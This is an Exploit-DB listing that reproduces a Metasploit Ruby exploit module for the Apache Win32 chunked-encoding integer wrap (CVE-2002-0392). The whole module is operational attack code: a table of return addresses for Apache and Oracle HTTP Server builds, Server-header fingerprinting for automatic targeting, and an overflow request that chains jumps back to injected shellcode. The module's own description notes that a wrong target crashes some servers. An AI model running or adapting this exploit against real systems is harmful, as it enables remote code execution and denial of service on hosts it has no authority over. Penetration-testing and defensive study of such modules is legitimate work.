Apache (Windows x86) - Chunked Encoding (Metasploit)

EDB-ID:

16782




Platform:

Windows_x86

Date:

2010-07-07


##
# $Id: apache_chunked.rb 9719 2010-07-07 17:38:59Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	HttpFingerprint = { :pattern => [ /Apache/ ] }

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Apache Win32 Chunked Encoding',
			'Description'    => %q{
					This module exploits the chunked transfer integer wrap
				vulnerability in Apache version 1.2.x to 1.3.24. This
				particular module has been tested with all versions of the
				official Win32 build between 1.3.9 and 1.3.24. Additionally,
				it should work against most co-branded and bundled versions
				of Apache (Oracle 8i, 9i, IBM HTTPD, etc).

				You will need to use the Check() functionality to determine
				the exact target version prior to launching the exploit. The
				version of Apache bundled with Oracle 8.1.7 will not
				automatically restart, so if you use the wrong target value,
				the server will crash.
			},
			'Author'         => [ 'hdm', 'jduck' ],
			'Version'        => '$Revision: 9719 $',
			'References'     =>
				[
					[ 'CVE', '2002-0392' ],
					[ 'OSVDB', '838'],
					[ 'BID', '5033' ],
					[ 'URL', 'http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html'],

				],
			'Privileged'     => true,
			'Platform'       => 'win',
			'Payload'        =>
				{
					'Space'    => 987,
					'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
					'MinNops'  => 200,
					'Prepend'  => "\x81\xc4\xff\xef\xff\xff\x44",

				},
			'Targets'        =>
				[
					[  'Windows Generic Bruteforce', {} ],

					# Official Apache.org win32 builds
					[  'Apache.org Build 1.3.9->1.3.19',
						{
							'Ret' => 0x00401151,
							'Pad' => [6,2,0,4,1,3,5,7]
						}
					],
					[  'Apache.org Build 1.3.22->1.3.24',
						{
							'Ret' => 0x00401141,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],
					[  'Apache.org Build 1.3.19->1.3.24',
						{
							'Ret' => 0x6ff6548d,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],
					[  'Apache.org Build 1.3.22',
						{
							'Ret' => 0x6ff762ac,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],

					# Return to Win9xConHook.dll via call ebx
					[  'Apache.org Build 1.3.17->1.3.24 (Windows 2000)',
						{
							'Ret' => 0x1c0f13e5,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],

					# Return to Win9xConHook.dll via call esi
					[  'Apache.org Build 1.3.17->1.3.24 (Windows NT)',
						{
							'Ret' => 0x1c0f1033,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],

					# Interesting return to PEB trick for Windows 2003 systems...
					[  'Windows 2003 English SP0',
						{
							'Ret' => 0x7ffc0638,
							'Pad' => [2,6,5,4,1,3,0,7]
						}
					],

					# Pop/Pop/Return on Windows 2000
					[  'Windows 2000 English',
						{
							'Ret' => 0x75022ac4,
							'Pad' => [2,6,5,4,1,3,0,7]
						}
					],

					# Oracle HTTPD: [ 8.1.7 ] (one shot)
					# Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4
					# OpenSSL/0.9.5a mod_perl/1.24
					[  'Oracle 8.1.7 Apache 1.3.12',
						{
							'Ret' => 0x1d84d42c,
							'Pad' => [7]
						}
					],

					# Oracle HTTPD: [ 9.1.0 ] (multiple shots)
					# Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4
					# OpenSSL/0.9.5a mod_perl/1.24
					[  'Oracle 9.1.0 Apache 1.3.12',
						{
							'Ret' => 0x10016061,
							'Pad' => [5,6,0,4,1,3,2,7]
						}
					],

					# Oracle HTTPD: [ 9.2.0 ] (multiple shots)
					# Oracle HTTP Server Powered by Apache/1.3.22 (Win32)
					# mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b
					# mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25
					[  'Oracle 9.2.0 Apache 1.3.22',
						{
							'Ret' => 0x6ff6427a,
							'Pad' => [5,6,0,4,1,3,2,7]
						}
					],

					# Generic debugging targets
					[  'Debugging Target',
						{
							'Ret' => 0xcafebabe,
							'Pad' => [0,1,2,3,4,5,6,7]
						}
					]
				],
			'DisclosureDate' => 'Jun 19 2002',
			'DefaultTarget'  => 0))
	end

	def check
		response = send_request_raw({'uri' => '/'}, 5)
		if response.nil?
			print_status("No response to request")
			return Exploit::CheckCode::Safe
		end

		http_fingerprint({ :response => response })  # Custom Server header matching

		code = Exploit::CheckCode::Appears

		case response['Server']
			when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
				print_status("This looks like an Oracle 8.1.7 Apache service (one-shot only)")
			when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
				print_status("This looks like an Oracle 9.1.0 Apache service (multiple tries allowed)")
			when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
				print_status("This looks like an Oracle 9.2.0 Apache service (multiple tries allowed)")
			when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
				print_status("IBM backported the patch, this system is not vulnerable")
				code = Exploit::CheckCode::Safe
			when /Apache(-AdvancedExtranetServer)?\/(1\.([0-2]\.[0-9]|3\.([0-9][^0-9]|[0-1][0-9]|2[0-5]))|2\.0.([0-9][^0-9]|[0-2][0-9]|3[0-8]))/
			else
				code = Exploit::CheckCode::Safe
		end

		if code == Exploit::CheckCode::Appears
			print_status("Vulnerable server: #{response['Server']}")
		else
			print_status("Server is probably not vulnerable: #{response['Server']}")
		end

		return code
	end

	def auto_target
		response = send_request_raw({'uri' => '/'}, 5)
		if response.nil?
			print_error("No response to request")
			return targets_to_try
		end

		http_fingerprint({ :response => response })  # Custom Server header matching / automatic target selection

		targets_to_try = []
		server_hdr = response['Server']
		print_status("Server: #{server_hdr}")

		case server_hdr
		when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
			targets_to_try.push(targets[9])

		when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
			targets_to_try.push(targets[10])

		when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
			targets_to_try.push(targets[11])

		when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
			# fall through

		else
			# check for apache version ranges
			if (server_hdr =~ /Apache\/([^ ]*)/) or (server_hdr =~ /Apache-AdvancedExtranetServer\/([^ ]*)/)
				version = $1

				#print_status("Apache version: #{version}")
				ver = version.split('.')
				if (ver.length == 3)
					major = ver[0].to_i
					minor = ver[1].to_i
					rev = ver[2].to_i
					if (major == 1 and minor == 3)
						targets_to_try.push(targets[1]) if (rev >= 9 and rev <= 19)
						targets_to_try.push(targets[2]) if (rev >= 22 and rev <= 24)
						targets_to_try.push(targets[3]) if (rev >= 19 and rev <= 24)
						targets_to_try.push(targets[4]) if (rev == 22)

						# Add the remaining targets, regardless of quality...
						if (server_hdr =~ /Win32/)
							# targets 4, 5, 6, 7
							if (rev >= 17 and rev <= 24)
								targets_to_try.push(targets[5])
								targets_to_try.push(targets[6])
							end
							targets_to_try.push(targets[7])
							targets_to_try.push(targets[8])
						end
					end
					# Version 1.0 - 1.2, Fall through...
				end
				# ServerTokens setting isn't giving up enough information ...  Might need to try?
			end
			# Not Apache?  Fall through...
		end

		targets_to_try
	end

	#
	# If auto, ask the auto_target function for a list of
	# targets to try...
	#
	# If not auto, just try the selected target.
	#
	def exploit
		if target_index == 0
			targs = auto_target
			print_status("Auto-targeting returned #{targs.length} candidates...")
			targs.each_with_index { |targ, idx|
				# Never try the debug target automatically :)
				next if targ.name =~ /Debug/
				exploit_target(targ)
			}
		else
			exploit_target(target)
		end
	end

	def exploit_target(target)
		target['Pad'].each { |pad|
			pattern =
				rand_text_alphanumeric(3936) +
				payload.encoded +
				make_nops(6) + "\xe9" + [-900].pack('V') + "pP" +
				rand_text_alphanumeric(pad)

			# Move slightly further back to allow padding changes
			pattern +=
				"\xeb\xf0\xde\xad" +
				[target.ret].pack('V')

			# Create a chain of return addresses and reverse jumps
			254.times { |x|
				pattern +=
					"\xeb\xf6\xbe\xef" +
					[target.ret].pack('V')
			}

			# Even out the request length based on the padding value
			# This is required to reliably hit the return address offset
			pattern += rand_text_alphanumeric(8 - pad)

			#
			# Regardless of what return we hit, execution jumps backwards to the shellcode:
			#                                   _______________ _______________ ___________
			#       _________    _____________  | ________    | | ______      | | ______
			#       v       |    v           |  v v      |    | v v    |      | v v    |
			# [shellcode] [jmp -949] [pad] [jmp -16] [ret] [jmp -8] [ret] [jmp -8] [ret]
			#

			print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]")

			# Build the request
			send_request_raw({
				'uri'     => '/',
				'headers' =>
					{
						'Transfer-Encoding' => "CHUNKED"
					},
				'data'    => "FFFFFFF0 " + pattern,
			}, 2)

			# Check the handler
			handler
		}
	end

end